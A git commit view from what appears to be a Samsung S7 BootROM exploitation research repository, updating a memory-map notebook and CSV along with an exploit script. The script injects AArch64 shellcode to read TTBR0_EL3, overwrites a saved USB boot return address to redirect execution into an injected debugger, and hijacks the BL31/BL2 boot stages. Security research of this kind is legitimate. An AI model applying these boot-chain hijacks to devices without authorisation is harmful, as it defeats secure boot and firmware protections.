EljakimHerrewijnen/Samsung_S7
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

TTBR0_EL3 visible after BL31

Browse Source
This commit is contained in:
Jonathan Herrewijnen 2024-08-28 18:45:05 +02:00
parent 91c7d60638
commit a12453cbd3
4 changed files with 254 additions and 164 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
documentation/source/BootROM_8890/images/memory_layout.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 174 KiB

234
documentation/source/_ignore/draw_boot.ipynb
View File

@ -2,7 +2,7 @@
"cells": [
{
"cell_type": "code",
"execution_count": 416,
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
@ -20,7 +20,7 @@
},
{
"cell_type": "code",
"execution_count": 417,
"execution_count": 2,
"metadata": {},
"outputs": [
{
@ -49,6 +49,8 @@
" <th>name</th>\n",
" <th>order</th>\n",
" <th>comment</th>\n",
" <th>X0</th>\n",
" <th>LR</th>\n",
" <th>size</th>\n",
" <th>overlap</th>\n",
" <th>overlap_with</th>\n",
@ -62,6 +64,8 @@
" <td>BootROM</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>131072</td>\n",
" <td>True</td>\n",
" <td>0.0</td>\n",
@ -73,6 +77,8 @@
" <td>_jump_bl1</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>True</td>\n",
" <td>0.0</td>\n",
@ -84,6 +90,8 @@
" <td>_boot_usb</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>172</td>\n",
" <td>True</td>\n",
" <td>0.0</td>\n",
@ -95,6 +103,8 @@
" <td>auth_bl1</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>160</td>\n",
" <td>True</td>\n",
" <td>0.0</td>\n",
@ -106,6 +116,8 @@
" <td>Tried debugger space</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>28672</td>\n",
" <td>False</td>\n",
" <td>4.0</td>\n",
@ -117,6 +129,8 @@
" <td>_boot_usb_ra</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>8</td>\n",
" <td>False</td>\n",
" <td>5.0</td>\n",
@ -128,6 +142,8 @@
" <td>BL1</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>8192</td>\n",
" <td>False</td>\n",
" <td>6.0</td>\n",
@ -139,6 +155,8 @@
" <td>BL31</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>147456</td>\n",
" <td>False</td>\n",
" <td>7.0</td>\n",
@ -150,6 +168,8 @@
" <td>BL2</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>158992</td>\n",
" <td>True</td>\n",
" <td>8.0</td>\n",
@ -161,6 +181,8 @@
" <td>Debugger</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>24576</td>\n",
" <td>True</td>\n",
" <td>8.0</td>\n",
@ -172,6 +194,8 @@
" <td>End/Start peripheral space?</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>4848</td>\n",
" <td>True</td>\n",
" <td>9.0</td>\n",
@ -183,6 +207,8 @@
" <td>Debugger relocated</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>28672</td>\n",
" <td>True</td>\n",
" <td>11.0</td>\n",
@ -194,6 +220,8 @@
" <td>_frederic_dest_ptr</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>True</td>\n",
" <td>11.0</td>\n",
@ -205,6 +233,8 @@
" <td>modem_interface</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>2048</td>\n",
" <td>False</td>\n",
" <td>13.0</td>\n",
@ -216,6 +246,8 @@
" <td>mali@14AC0000</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>20480</td>\n",
" <td>False</td>\n",
" <td>14.0</td>\n",
@ -225,42 +257,42 @@
"</div>"
],
"text/plain": [
" start end name order comment size \\\n",
"0 0 131072 BootROM NaN NaN 131072 \n",
"1 704 708 _jump_bl1 NaN NaN 4 \n",
"2 25824 25996 _boot_usb NaN NaN 172 \n",
"3 75848 76008 auth_bl1 NaN NaN 160 \n",
"4 33660508 33689180 Tried debugger space NaN NaN 28672 \n",
"5 33689440 33689448 _boot_usb_ra NaN NaN 8 \n",
"6 33693696 33701888 BL1 NaN NaN 8192 \n",
"7 33701888 33849344 BL31 NaN NaN 147456 \n",
"8 33849344 34008336 BL2 NaN NaN 158992 \n",
"9 33984512 34009088 Debugger NaN NaN 24576 \n",
"10 34008336 34013184 End/Start peripheral space? NaN NaN 4848 \n",
"11 34340864 34369536 Debugger relocated NaN NaN 28672 \n",
"12 34340864 34340868 _frederic_dest_ptr NaN NaN 4 \n",
"13 34371584 34373632 modem_interface NaN NaN 2048 \n",
"14 346816512 346836992 mali@14AC0000 NaN NaN 20480 \n",
" start end name order comment X0 LR \\\n",
"0 0 131072 BootROM NaN NaN NaN NaN \n",
"1 704 708 _jump_bl1 NaN NaN NaN NaN \n",
"2 25824 25996 _boot_usb NaN NaN NaN NaN \n",
"3 75848 76008 auth_bl1 NaN NaN NaN NaN \n",
"4 33660508 33689180 Tried debugger space NaN NaN NaN NaN \n",
"5 33689440 33689448 _boot_usb_ra NaN NaN NaN NaN \n",
"6 33693696 33701888 BL1 NaN NaN NaN NaN \n",
"7 33701888 33849344 BL31 NaN NaN NaN NaN \n",
"8 33849344 34008336 BL2 NaN NaN NaN NaN \n",
"9 33984512 34009088 Debugger NaN NaN NaN NaN \n",
"10 34008336 34013184 End/Start peripheral space? NaN NaN NaN NaN \n",
"11 34340864 34369536 Debugger relocated NaN NaN NaN NaN \n",
"12 34340864 34340868 _frederic_dest_ptr NaN NaN NaN NaN \n",
"13 34371584 34373632 modem_interface NaN NaN NaN NaN \n",
"14 346816512 346836992 mali@14AC0000 NaN NaN NaN NaN \n",
"\n",
" overlap overlap_with \n",
"0 True 0.0 \n",
"1 True 0.0 \n",
"2 True 0.0 \n",
"3 True 0.0 \n",
"4 False 4.0 \n",
"5 False 5.0 \n",
"6 False 6.0 \n",
"7 False 7.0 \n",
"8 True 8.0 \n",
"9 True 8.0 \n",
"10 True 9.0 \n",
"11 True 11.0 \n",
"12 True 11.0 \n",
"13 False 13.0 \n",
"14 False 14.0 "
" size overlap overlap_with \n",
"0 131072 True 0.0 \n",
"1 4 True 0.0 \n",
"2 172 True 0.0 \n",
"3 160 True 0.0 \n",
"4 28672 False 4.0 \n",
"5 8 False 5.0 \n",
"6 8192 False 6.0 \n",
"7 147456 False 7.0 \n",
"8 158992 True 8.0 \n",
"9 24576 True 8.0 \n",
"10 4848 True 9.0 \n",
"11 28672 True 11.0 \n",
"12 4 True 11.0 \n",
"13 2048 False 13.0 \n",
"14 20480 False 14.0 "
]
},
"execution_count": 417,
"execution_count": 2,
"metadata": {},
"output_type": "execute_result"
}
@ -320,7 +352,7 @@
},
{
"cell_type": "code",
"execution_count": 418,
"execution_count": 3,
"metadata": {},
"outputs": [
{
@ -332,7 +364,7 @@
"data": [
{
"marker": {
"color": "#c574e6"
"color": "#46d3f4"
},
"mode": "text",
"name": "BootROM",
@ -348,7 +380,7 @@
},
{
"marker": {
"color": "#c574e6"
"color": "#46d3f4"
},
"mode": "text",
"showlegend": false,
@ -364,7 +396,7 @@
},
{
"marker": {
"color": "#c574e6"
"color": "#46d3f4"
},
"mode": "text",
"showlegend": false,
@ -380,7 +412,7 @@
},
{
"marker": {
"color": "#094b47"
"color": "#05f11d"
},
"mode": "text",
"name": "_jump_bl1",
@ -396,7 +428,7 @@
},
{
"marker": {
"color": "#094b47"
"color": "#05f11d"
},
"mode": "text",
"showlegend": false,
@ -412,7 +444,7 @@
},
{
"marker": {
"color": "#094b47"
"color": "#05f11d"
},
"mode": "text",
"showlegend": false,
@ -428,7 +460,7 @@
},
{
"marker": {
"color": "#f3ff4d"
"color": "#15ef8e"
},
"mode": "text",
"name": "_boot_usb",
@ -444,7 +476,7 @@
},
{
"marker": {
"color": "#f3ff4d"
"color": "#15ef8e"
},
"mode": "text",
"showlegend": false,
@ -460,7 +492,7 @@
},
{
"marker": {
"color": "#f3ff4d"
"color": "#15ef8e"
},
"mode": "text",
"showlegend": false,
@ -476,7 +508,7 @@
},
{
"marker": {
"color": "#7e3e97"
"color": "#d1cb9b"
},
"mode": "text",
"name": "auth_bl1",
@ -492,7 +524,7 @@
},
{
"marker": {
"color": "#7e3e97"
"color": "#d1cb9b"
},
"mode": "text",
"showlegend": false,
@ -508,7 +540,7 @@
},
{
"marker": {
"color": "#7e3e97"
"color": "#d1cb9b"
},
"mode": "text",
"showlegend": false,
@ -524,7 +556,7 @@
},
{
"marker": {
"color": "#e36dac"
"color": "#bafebb"
},
"mode": "text",
"name": "Tried debugger space",
@ -540,7 +572,7 @@
},
{
"marker": {
"color": "#e36dac"
"color": "#bafebb"
},
"mode": "text",
"showlegend": false,
@ -556,7 +588,7 @@
},
{
"marker": {
"color": "#e36dac"
"color": "#bafebb"
},
"mode": "text",
"showlegend": false,
@ -572,7 +604,7 @@
},
{
"marker": {
"color": "#9d6e7f"
"color": "#b21068"
},
"mode": "text",
"name": "_boot_usb_ra",
@ -588,7 +620,7 @@
},
{
"marker": {
"color": "#9d6e7f"
"color": "#b21068"
},
"mode": "text",
"showlegend": false,
@ -604,7 +636,7 @@
},
{
"marker": {
"color": "#9d6e7f"
"color": "#b21068"
},
"mode": "text",
"showlegend": false,
@ -620,7 +652,7 @@
},
{
"marker": {
"color": "#48e551"
"color": "#d43e00"
},
"mode": "text",
"name": "BL1",
@ -636,7 +668,7 @@
},
{
"marker": {
"color": "#48e551"
"color": "#d43e00"
},
"mode": "text",
"showlegend": false,
@ -652,7 +684,7 @@
},
{
"marker": {
"color": "#48e551"
"color": "#d43e00"
},
"mode": "text",
"showlegend": false,
@ -668,7 +700,7 @@
},
{
"marker": {
"color": "#082a5a"
"color": "#2fcf29"
},
"mode": "text",
"name": "BL31",
@ -684,7 +716,7 @@
},
{
"marker": {
"color": "#082a5a"
"color": "#2fcf29"
},
"mode": "text",
"showlegend": false,
@ -700,7 +732,7 @@
},
{
"marker": {
"color": "#082a5a"
"color": "#2fcf29"
},
"mode": "text",
"showlegend": false,
@ -716,7 +748,7 @@
},
{
"marker": {
"color": "#12adbc"
"color": "#7ac7dc"
},
"mode": "text",
"name": "BL2",
@ -732,7 +764,7 @@
},
{
"marker": {
"color": "#12adbc"
"color": "#7ac7dc"
},
"mode": "text",
"showlegend": false,
@ -748,7 +780,7 @@
},
{
"marker": {
"color": "#12adbc"
"color": "#7ac7dc"
},
"mode": "text",
"showlegend": false,
@ -764,7 +796,7 @@
},
{
"marker": {
"color": "#afec87"
"color": "#1a256d"
},
"mode": "text",
"name": "Debugger",
@ -780,7 +812,7 @@
},
{
"marker": {
"color": "#afec87"
"color": "#1a256d"
},
"mode": "text",
"showlegend": false,
@ -796,7 +828,7 @@
},
{
"marker": {
"color": "#afec87"
"color": "#1a256d"
},
"mode": "text",
"showlegend": false,
@ -812,7 +844,7 @@
},
{
"marker": {
"color": "#680696"
"color": "#b0eb7f"
},
"mode": "text",
"name": "End/Start peripheral space?",
@ -828,7 +860,7 @@
},
{
"marker": {
"color": "#680696"
"color": "#b0eb7f"
},
"mode": "text",
"showlegend": false,
@ -844,7 +876,7 @@
},
{
"marker": {
"color": "#680696"
"color": "#b0eb7f"
},
"mode": "text",
"showlegend": false,
@ -860,7 +892,7 @@
},
{
"marker": {
"color": "#feeb63"
"color": "#e42eab"
},
"mode": "text",
"name": "Debugger relocated",
@ -876,7 +908,7 @@
},
{
"marker": {
"color": "#feeb63"
"color": "#e42eab"
},
"mode": "text",
"showlegend": false,
@ -892,7 +924,7 @@
},
{
"marker": {
"color": "#feeb63"
"color": "#e42eab"
},
"mode": "text",
"showlegend": false,
@ -908,7 +940,7 @@
},
{
"marker": {
"color": "#51c421"
"color": "#b86b0c"
},
"mode": "text",
"name": "_frederic_dest_ptr",
@ -924,7 +956,7 @@
},
{
"marker": {
"color": "#51c421"
"color": "#b86b0c"
},
"mode": "text",
"showlegend": false,
@ -940,7 +972,7 @@
},
{
"marker": {
"color": "#51c421"
"color": "#b86b0c"
},
"mode": "text",
"showlegend": false,
@ -956,7 +988,7 @@
},
{
"marker": {
"color": "#a8b579"
"color": "#625596"
},
"mode": "text",
"name": "modem_interface",
@ -972,7 +1004,7 @@
},
{
"marker": {
"color": "#a8b579"
"color": "#625596"
},
"mode": "text",
"showlegend": false,
@ -988,7 +1020,7 @@
},
{
"marker": {
"color": "#a8b579"
"color": "#625596"
},
"mode": "text",
"showlegend": false,
@ -1004,7 +1036,7 @@
},
{
"marker": {
"color": "#521205"
"color": "#5b6129"
},
"mode": "text",
"name": "mali@14AC0000",
@ -1020,7 +1052,7 @@
},
{
"marker": {
"color": "#521205"
"color": "#5b6129"
},
"mode": "text",
"showlegend": false,
@ -1036,7 +1068,7 @@
},
{
"marker": {
"color": "#521205"
"color": "#5b6129"
},
"mode": "text",
"showlegend": false,
@ -1070,7 +1102,7 @@
},
"shapes": [
{
"fillcolor": "#c574e6",
"fillcolor": "#46d3f4",
"layer": "below",
"line": {
"width": 2
@ -1083,7 +1115,7 @@
"y1": 3.92
},
{
"fillcolor": "#094b47",
"fillcolor": "#05f11d",
"layer": "below",
"line": {
"width": 2
@ -1096,7 +1128,7 @@
"y1": 1.79
},
{
"fillcolor": "#f3ff4d",
"fillcolor": "#15ef8e",
"layer": "below",
"line": {
"width": 2
@ -1109,7 +1141,7 @@
"y1": 2.79
},
{
"fillcolor": "#7e3e97",
"fillcolor": "#d1cb9b",
"layer": "below",
"line": {
"width": 2
@ -1122,7 +1154,7 @@
"y1": 3.79
},
{
"fillcolor": "#e36dac",
"fillcolor": "#bafebb",
"layer": "below",
"line": {
"width": 2
@ -1135,7 +1167,7 @@
"y1": 4.92
},
{
"fillcolor": "#9d6e7f",
"fillcolor": "#b21068",
"layer": "below",
"line": {
"width": 2
@ -1148,7 +1180,7 @@
"y1": 5.92
},
{
"fillcolor": "#48e551",
"fillcolor": "#d43e00",
"layer": "below",
"line": {
"width": 2
@ -1161,7 +1193,7 @@
"y1": 6.92
},
{
"fillcolor": "#082a5a",
"fillcolor": "#2fcf29",
"layer": "below",
"line": {
"width": 2
@ -1174,7 +1206,7 @@
"y1": 7.92
},
{
"fillcolor": "#12adbc",
"fillcolor": "#7ac7dc",
"layer": "below",
"line": {
"width": 2
@ -1187,7 +1219,7 @@
"y1": 9.42
},
{
"fillcolor": "#afec87",
"fillcolor": "#1a256d",
"layer": "below",
"line": {
"width": 2
@ -1200,7 +1232,7 @@
"y1": 9.79
},
{
"fillcolor": "#680696",
"fillcolor": "#b0eb7f",
"layer": "below",
"line": {
"width": 2
@ -1213,7 +1245,7 @@
"y1": 10.79
},
{
"fillcolor": "#feeb63",
"fillcolor": "#e42eab",
"layer": "below",
"line": {
"width": 2
@ -1226,7 +1258,7 @@
"y1": 12.92
},
{
"fillcolor": "#51c421",
"fillcolor": "#b86b0c",
"layer": "below",
"line": {
"width": 2
@ -1239,7 +1271,7 @@
"y1": 12.79
},
{
"fillcolor": "#a8b579",
"fillcolor": "#625596",
"layer": "below",
"line": {
"width": 2
@ -1252,7 +1284,7 @@
"y1": 13.92
},
{
"fillcolor": "#521205",
"fillcolor": "#5b6129",
"layer": "below",
"line": {
"width": 2
@ -2281,6 +2313,16 @@
"\n",
"fig.show()"
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {},
"outputs": [],
"source": [
"# Save to html\n",
"fig.write_html(\"stack_and_functions.html\")"
]
}
],
"metadata": {

32
documentation/source/_ignore/stack_and_functions.csv
View File

@ -1,16 +1,16 @@
start,end,name,order,comment
0x00000000,0x00020000,BootROM,,
0x02020f60,0x02020f68,_boot_usb_ra,,
0x00012848,0x000128e8,auth_bl1,,
0x000064e0,0x0000658c,_boot_usb,,
0x020c0000,0x020c0004,_frederic_dest_ptr,,
0x000002c0,0x000002c4,_jump_bl1,,
0x02022000,0x02024000,BL1,,
0x02024000,0x02048000,BL31,,
0x02048000,0x0206ed10,BL2,,
0x02069000,0x0206f000,Debugger,,
0x020c0000,0x020c7000,Debugger relocated,,
0x0206ed10,0x02070000,End/Start peripheral space?,,
0x02019e5c,0x02020e5c,Tried debugger space,,
0x020C7800,0x020C8000,modem_interface,,
0x14AC0000,0x14ac5000,mali@14AC0000
start,end,name,order,comment,X0,LR
0x00000000,0x00020000,BootROM,,,,
0x02020f60,0x02020f68,_boot_usb_ra,,,,
0x00012848,0x000128e8,auth_bl1,,,,
0x000064e0,0x0000658c,_boot_usb,,,,
0x020c0000,0x020c0004,_frederic_dest_ptr,,,,
0x000002c0,0x000002c4,_jump_bl1,,,,
0x02022000,0x02024000,BL1,,,,
0x02024000,0x02048000,BL31,,,,
0x02048000,0x0206ed10,BL2,,,,
0x02069000,0x0206f000,Debugger,,,,
0x020c0000,0x020c7000,Debugger relocated,,,,
0x0206ed10,0x02070000,End/Start peripheral space?,,,,
0x02019e5c,0x02020e5c,Tried debugger space,,,,
0x020C7800,0x020C8000,modem_interface,,,,
0x14AC0000,0x14ac5000,mali@14AC0000,,,,
Can't render this file because it has a wrong number of fields in line 16.

152
source/exploit/exploit.py
View File

@ -321,6 +321,26 @@ class ExynosDevice():
except:
print("Error reading memory, at block: ", hex(block))
return dumped
def check_mem_write_execute(self, region):
"""
NOT WORKING YET
Write opcode to memory which jumps back immediatelly to the LR register at that moment.
"""
# LR to jump back to:
lr = self.cd.arch_dbg.state.LR
# Write opcode
shellcode = f"""
ldr x0, target_addr
blr x0
target_addr: .quad {hex(lr)}
"""
shellcode = ks.asm(shellcode, as_bytes=True)[0]
self.cd.memwrite_region(region, shellcode)
self.cd.jump_to(region)
def setup_guppy_debugger(self):
@ -339,14 +359,16 @@ class ExynosDevice():
def _initial_run_debugger():
"""Write debugger to device and test basic functionality"""
### Setup debugger
if os.getenv("USER") == "eljakim":
debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
else:
try:
debugger = open("../../dump/debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
debugger += ((0x2000 - len(debugger)) * b"\x00")
assert len(debugger) == 0x2000, "Invalid debugger size, stage1 requires 0x2000 size"
for block in range(0, len(debugger), 0x200):
@ -363,39 +385,34 @@ class ExynosDevice():
_setup_debugger()
def relocate_debugger(self):
# Seems to be cleared upon cache clearing??
if os.getenv("USER") == "eljakim":
debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
else:
try:
debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
def relocate_debugger(self, debugger=None, entry=0x020c0000, storage=0x020c4000, g_data_received=0x020c6000):
"""
Relocates the debugger to another location. Make sure to have built the debugger with the correct addresses!
self.cd.memwrite_region(0x020c0000, debugger_reloc)
Args:
- debugger: The debugger to relocate. If None, it will use the default debugger.
- entry: The entry point of the debugger.
- storage: The storage location of the debugger.
- g_data_received: The location of the data received.
"""
if debugger is None:
if os.getenv("USER") == "eljakim":
debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
else:
try:
debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
else:
debugger_reloc = debugger
self.cd.memwrite_region(entry, debugger_reloc)
# self.usb_write(b"FLSH") # Flush cache
self.cd.restore_stack_and_jump(0x020c0000)
self.cd.restore_stack_and_jump(entry)
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
self.cd.relocate_debugger(g_data_received+0x1000, entry, storage) #0x20c7000, 0x20c0000, 0x20c4000
def relocate_debugger_2(self):
# Seems to be cleared upon cache clearing??
if os.getenv("USER") == "eljakim":
debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
else:
try:
debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
self.cd.memwrite_region(0x020c0000, debugger_reloc)
# self.usb_write(b"FLSH") # Flush cache
self.cd.restore_stack_and_jump(0x020c0000)
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
def dumb_interact(self, dump_imems=False):
'''
@ -560,13 +577,33 @@ class ExynosDevice():
# self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
# self.cd.restore_stack_and_jump(0x00012814)
# self.cd.restore_stack_and_jump(0x000125b4)
def get_ttbr0_el3(self):
shellcode= f"""
mov x1, lr
mrs x0, ttbr0_el3
ldr x2, =0x020c1000
str x0, [x2]
mov lr, x1
ret
"""
shellcode = ks.asm(shellcode, as_bytes=True)[0]
self.cd.memwrite_region(0x020c0000, shellcode)
self.cd.jump_to(0x020c0000)
ttbr0 = u64(self.cd.memdump_region(0x020c1000, 8))
print(f"TTBR0_EL3: {hex(ttbr0)}")
print(f"Bits: {ttbr0:064b}")
# Overwrite it with 0's
self.cd.memwrite_region(0x020c1000, b"\x00" * 8)
ttbr0 = self.cd.memdump_region(0x020c1000, 8)
assert ttbr0 == b"\x00" * 8, "TTBR0_EL3 not overwritten"
def debugger_boot(self):
"""
Boot into USB recovery mode using the debugger.
"""
### Setup debugger
self.setup_guppy_debugger()
self.cd.arch_dbg.state.auto_sync = False
@ -576,10 +613,17 @@ class ExynosDevice():
# dumped = self.dump_memory(0x20000, 0x2070000)
DEBUGGER_ADDR = 0x2069000
DEBUGGER_ADDR = 0x2069000 # 0x2069000
self.get_ttbr0_el3()
# Relocate to other debugger
debugger = open("../../dump/reloc_debugger_0x2019e5c.bin", "rb").read()
self.relocate_debugger(debugger=debugger, entry=0x02048000, storage=0x02051000, g_data_received=0x02052000)
DEBUGGER_ADDR = 0x02048000
### Overwrite boot_usb_ra to our debugger
self.cd.test_connection()
hijacked_usb_ra = self.cd.memdump_region(0x02020f60, 8)
self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR))
@ -623,6 +667,9 @@ class ExynosDevice():
# ==== BL31 ====
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
self.get_ttbr0_el3()
# self.check_mem_write_execute(0x020c0000)
# Download next stage via ROM_DOWNLOAD_USB
lr = self.cd.arch_dbg.state.LR
@ -635,38 +682,39 @@ class ExynosDevice():
self.usb_read(0x200) # GiAs
# lr = self.cd.arch_dbg.state.LR
self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) # Resore oginal boot flow
# TODO patch verification
# self.cd.memwrite_region(0x0202010c - 52, p32(GADGET_RET0))
# self.cd.memwrite_region(0x02024774, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins)
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
# self.cd.arch_dbg.state.X0 = 0x020347f0
# self.cd.arch_dbg.state.X1 = 0
# self.cd.restore_stack_and_jump(0x02030464)
# self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) # Resore oginal boot flow
self.get_ttbr0_el3()
self.cd.restore_stack_and_jump(lr)
time.sleep(2)
self.usb_read(0x200) # GiAs
self.cd.memwrite_region(0x02031008, b"ELH")
# ====== PATCHES TO BL31 here! ======
# trampoline = self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br") # Keep LR
# self.cd.memwrite_region(0x02024020, trampoline)
# ====== PATCHES TO BL31 here! ======
# Relocate to other debugger
# debugger = open("../../dump/reloc_debugger_0x2019e5c.bin", "rb").read()
# self.relocate_debugger(debugger=debugger, entry=0x14AC0000, storage=0x14AC3000, g_data_received=0x14AC4000)
# DEBUGGER_ADDR = 0x14AC0000
# Jump BL31
self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
self.cd.memwrite_region(0x20219b8, p32(DEBUGGER_ADDR))
# self.cd.restore_stack_and_jump(hijacked_fun)
self.cd.restore_stack_and_jump(0x02024010)
time.sleep(2)
self.connect_device()
# self.usb_read(0x200) # GiAs
# self.cd.restore_stack_and_jump(hijacked_fun)
self.usb_read(0x200) # GiAs
self.cd.arch_dbg.fetch_special_regs()
# ==== Stage 3 BL2 ====
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())